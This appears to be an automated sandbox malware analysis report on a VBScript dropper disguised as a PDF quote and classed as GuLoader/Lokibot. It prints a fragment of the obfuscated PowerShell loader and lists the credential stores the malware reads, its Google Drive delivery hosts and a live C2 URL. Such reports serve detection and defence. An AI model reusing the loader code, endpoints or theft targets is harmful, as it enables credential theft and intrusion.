';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.amJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5496, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5496, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              221
              Scripting
              1
              DLL Side-Loading
              2
              Obfuscated Files or Information
              2
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              111
              Process Injection
              1
              Software Packing
              1
              Credentials in Registry
              14
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter
              Logon Script (Windows)Logon Script (Windows)1
              Timestomp
              Security Account Manager1
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets31
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428348 Sample: Request for Proposal Quote_... Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 37 drive.usercontent.google.com 2->37 39 drive.google.com 2->39 41 bg.microsoft.map.fastly.net 2->41 53 Snort IDS alert for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 5 other signatures 2->59 9 wscript.exe 2 2->9         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\Rundturens.txt, ASCII 9->33 dropped 61 VBScript performs obfuscated calls to suspicious functions 9->61 63 Suspicious powershell command line found 9->63 65 Wscript starts Powershell (via cmd or directly) 9->65 67 2 other signatures 9->67 13 powershell.exe 14 19 9->13         started        signatures6 process7 dnsIp8 45 drive.usercontent.google.com 173.194.219.132, 443, 49706, 49716 GOOGLEUS United States 13->45 47 drive.google.com 173.194.219.138, 443, 49705, 49715 GOOGLEUS United States 13->47 77 Suspicious powershell command line found 13->77 79 Very long command line found 13->79 81 Found suspicious powershell code related to unpacking or dynamic code loading 13->81 17 powershell.exe 17 13->17         started        20 conhost.exe 13->20         started        22 cmd.exe 1 13->22         started        signatures9 process10 signatures11 49 Writes to foreign memory regions 17->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 17->51 24 wab.exe 1 88 17->24         started        29 cmd.exe 1 17->29         started        31 wab.exe 17->31         started        process12 dnsIp13 43 24.199.107.111, 49717, 49718, 49719 TWC-12271-NYCUS United States 24->43 35 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 24->35 dropped 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->69 71 Tries to steal Mail credentials (via file / registry access) 24->71 73 Tries to harvest and steal ftp login credentials 24->73 75 Tries to harvest and steal browser information (history, passwords, etc) 24->75 file14 signatures15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Request for Proposal Quote_2414976#U00b7pdf.vbs13%ReversingLabsWin32.Trojan.Generic
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.210.172
              truefalse
                unknown
                drive.google.com
                173.194.219.138
                truefalse
                  high
                  drive.usercontent.google.com
                  173.194.219.132
                  truefalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    http://24.199.107.111/index.php/927339792true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.google.compowershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2611397020.000001A0CC716000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2528075391.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://drive.google.com/wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://go.micropowershell.exe, 00000002.00000002.2611397020.000001A0CBD7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://drive.google.com/4wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.2532896490.0000000006173000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://drive.google.compowershell.exe, 00000002.00000002.2611397020.000001A0CAB49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC1E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.usercontent.google.com/wab.exe, 00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2523247767.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://drive.google.compowershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.2611397020.000001A0CA921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://apis.google.compowershell.exe, 00000002.00000002.2611397020.000001A0CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CC6DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2611397020.000001A0CADAA000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498305991.00000000054C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2498442967.00000000054C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.microvpowershell.exe, 00000005.00000002.2536676585.0000000007ACA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2611397020.000001A0CA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2528075391.0000000005111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://24.199.107.111/index.php/927339792rwab.exe, 00000009.00000003.2559983367.00000000054C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2528075391.0000000005269000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          24.199.107.111
                                                          unknownUnited States
                                                          12271TWC-12271-NYCUStrue
                                                          173.194.219.138
                                                          drive.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          173.194.219.132
                                                          drive.usercontent.google.comUnited States
                                                          15169GOOGLEUSfalse
                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                          Analysis ID:1428348
                                                          Start date and time:2024-04-18 21:13:10 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 31s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:11
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Request for Proposal Quote_2414976#U00b7pdf.vbs
                                                          renamed because original name is a hash value
                                                          Original Sample Name:Request for Proposal Quote_2414976pdf.vbs
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.expl.evad.winVBS@14/13@2/3
                                                          EGA Information:
                                                          • Successful, ratio: 33.3%
                                                          HCA Information:
                                                          • Successful, ratio: 81%
                                                          • Number of executed functions: 54
                                                          • Number of non-executed functions: 19
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .vbs
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.47.204.65, 23.47.204.67, 23.47.204.77, 23.47.204.81, 23.47.204.44, 23.47.204.72, 23.47.204.78, 23.47.204.69, 23.47.204.45
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                          • Execution Graph export aborted for target powershell.exe, PID 2228 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 6784 because it is empty
                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: Request for Proposal Quote_2414976#U00b7pdf.vbs
                                                          TimeTypeDescription
                                                          21:14:01API Interceptor1x Sleep call for process: wscript.exe modified
                                                          21:14:05API Interceptor2372x Sleep call for process: powershell.exe modified
                                                          21:14:54API Interceptor58x Sleep call for process: wab.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          24.199.107.111DHL_Awb# 129448720998.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/720637
                                                          DHL_Awb# 12944872091.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/720637
                                                          SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/0672554332862
                                                          Payment Advice16007618765.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/0672554332862
                                                          Payment Advice1600761165.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/0672554332862
                                                          RFQ_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 24.199.107.111/index.php/927339792
                                                          QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 24.199.107.111/index.php/2028
                                                          FedEx_AWB#53023114643.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/0672554332862
                                                          DHL_Awb# 12944422091.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/720637
                                                          DHLAwb#1294404291.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111/index.php/720637
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          bg.microsoft.map.fastly.netSigned Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 199.232.210.172
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 199.232.210.172
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 199.232.214.172
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 199.232.214.172
                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 199.232.214.172
                                                          https://msteams.link/WK80Get hashmaliciousPhisherBrowse
                                                          • 199.232.214.172
                                                          https://watsonpropertyllc.formstack.com/forms/staffGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          http://www.traininng.comGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          https://cionfacttalleriproj.norwayeast.cloudapp.azure.com?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884Get hashmaliciousHTMLPhisherBrowse
                                                          • 199.232.214.172
                                                          SecuriteInfo.com.Win64.Trojan.Agent.ASGXPI.7352.29283.exeGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TWC-12271-NYCUSDHL_Awb# 129448720998.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111
                                                          DHL_Awb# 12944872091.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111
                                                          3OcPSlVa7n.elfGet hashmaliciousMiraiBrowse
                                                          • 69.200.78.23
                                                          SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111
                                                          0FnrrE8B6Y.elfGet hashmaliciousMiraiBrowse
                                                          • 208.120.167.230
                                                          Payment Advice16007618765.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111
                                                          Payment Advice1600761165.exeGet hashmaliciousLokibotBrowse
                                                          • 24.199.107.111
                                                          RFQ_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 24.199.107.111
                                                          QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                          • 24.199.107.111
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eSigned Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          F723838674.vbsGet hashmaliciousRemcosBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
                                                          pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                          • 173.194.219.138
                                                          • 173.194.219.132
